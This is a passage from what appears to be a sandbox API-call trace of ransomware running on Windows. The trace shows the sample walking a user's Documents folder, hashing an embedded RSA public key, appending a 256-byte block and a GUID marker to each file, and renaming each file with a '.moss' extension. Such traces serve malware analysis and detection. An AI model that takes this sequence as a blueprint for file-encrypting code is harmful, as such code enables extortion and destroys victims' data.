KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.843] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.843] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0169.845] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.845] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.845] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.845] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0169.845] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.845] GetLastError () returned 0x0 [0169.845] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.845] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0169.845] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.845] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.845] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.845] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.845] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0169.845] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0169.846] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x2174, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.846] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.846] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.846] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.846] CloseHandle (hObject=0x664) returned 1 [0169.847] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.847] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x890) returned 0x3b4b098 [0169.847] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RvABmrzNFr7uffIvxM.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rvabmrznfr7uffivxm.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RvABmrzNFr7uffIvxM.csv.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rvabmrznfr7uffivxm.csv.moss")) returned 1 [0169.849] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa611a490, ftCreationTime.dwHighDateTime=0x1d56072, ftLastAccessTime.dwLowDateTime=0x4de91090, ftLastAccessTime.dwHighDateTime=0x1d5d328, ftLastWriteTime.dwLowDateTime=0x4de91090, ftLastWriteTime.dwHighDateTime=0x1d5d328, nFileSizeHigh=0x0, nFileSizeLow=0xee0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sgDfcqe-OhCyXqFPsb.pptx", cAlternateFileName="SGDFCQ~1.PPT")) returned 1 [0169.849] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b41660 [0169.849] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8e) returned 0xd80bd8 [0169.850] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\sgDfcqe-OhCyXqFPsb.pptx") returned=".pptx" [0169.850] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\sgDfcqe-OhCyXqFPsb.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sgdfcqe-ohcyxqfpsb.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.850] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=3808) returned 1 [0169.850] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.853] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xeba, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.853] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.855] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.855] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xee0, lpOverlapped=0x0) returned 1 [0169.855] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.855] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0169.855] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.855] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.855] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0169.856] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.856] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.856] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.856] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0169.856] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.856] GetLastError () returned 0x0 [0169.856] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.856] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0169.857] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.857] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.857] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.857] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.857] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0169.857] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0169.857] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xee0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.857] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.858] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.858] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.858] CloseHandle (hObject=0x664) returned 1 [0169.859] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.859] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x890) returned 0x3b4b098 [0169.859] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\sgDfcqe-OhCyXqFPsb.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sgdfcqe-ohcyxqfpsb.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\sgDfcqe-OhCyXqFPsb.pptx.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sgdfcqe-ohcyxqfpsb.pptx.moss")) returned 1 [0169.861] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79227f40, ftCreationTime.dwHighDateTime=0x1d5a2b2, ftLastAccessTime.dwLowDateTime=0xe6806390, ftLastAccessTime.dwHighDateTime=0x1d5e4f2, ftLastWriteTime.dwLowDateTime=0xe6806390, ftLastWriteTime.dwHighDateTime=0x1d5e4f2, nFileSizeHigh=0x0, nFileSizeLow=0x15004, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="t pf4mloRUo8M53tm.pptx", cAlternateFileName="TPF4ML~1.PPT")) returned 1 [0169.861] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b41660 [0169.861] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8e) returned 0xd80bd8 [0169.861] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\t pf4mloRUo8M53tm.pptx") returned=".pptx" [0169.861] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\t pf4mloRUo8M53tm.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\t pf4mloruo8m53tm.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.861] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=86020) returned 1 [0169.861] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.865] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x14fde, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.865] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.866] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.867] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x15004, lpOverlapped=0x0) returned 1 [0169.868] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.868] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0169.868] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.868] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.868] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0169.870] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.870] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.870] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.870] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0169.870] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.870] GetLastError () returned 0x0 [0169.870] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.870] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0169.870] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.870] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.870] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.870] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.871] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0169.871] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0169.872] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x15004, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.872] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.872] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.872] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.872] CloseHandle (hObject=0x664) returned 1 [0169.879] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.879] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x890) returned 0x3b4b098 [0169.879] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\t pf4mloRUo8M53tm.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\t pf4mloruo8m53tm.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\t pf4mloRUo8M53tm.pptx.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\t pf4mloruo8m53tm.pptx.moss")) returned 1 [0169.881] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab152800, ftCreationTime.dwHighDateTime=0x1d5849d, ftLastAccessTime.dwLowDateTime=0xa2b38210, ftLastAccessTime.dwHighDateTime=0x1d59d52, ftLastWriteTime.dwLowDateTime=0xa2b38210, ftLastWriteTime.dwHighDateTime=0x1d59d52, nFileSizeHigh=0x0, nFileSizeLow=0x10ba9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wbij5VgtvvOhJD.pptx", cAlternateFileName="WBIJ5V~1.PPT")) returned 1 [0169.881] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b41660 [0169.881] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8e) returned 0xd80bd8 [0169.881] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wbij5VgtvvOhJD.pptx") returned=".pptx" [0169.882] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\wbij5VgtvvOhJD.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wbij5vgtvvohjd.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.882] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=68521) returned 1 [0169.882] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.885] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x10b83, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.885] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.886] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.886] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x10ba9, lpOverlapped=0x0) returned 1 [0169.886] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.886] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0169.886] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.886] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.886] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0169.888] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.888] CryptHashData (hHash=0x362b8e0, 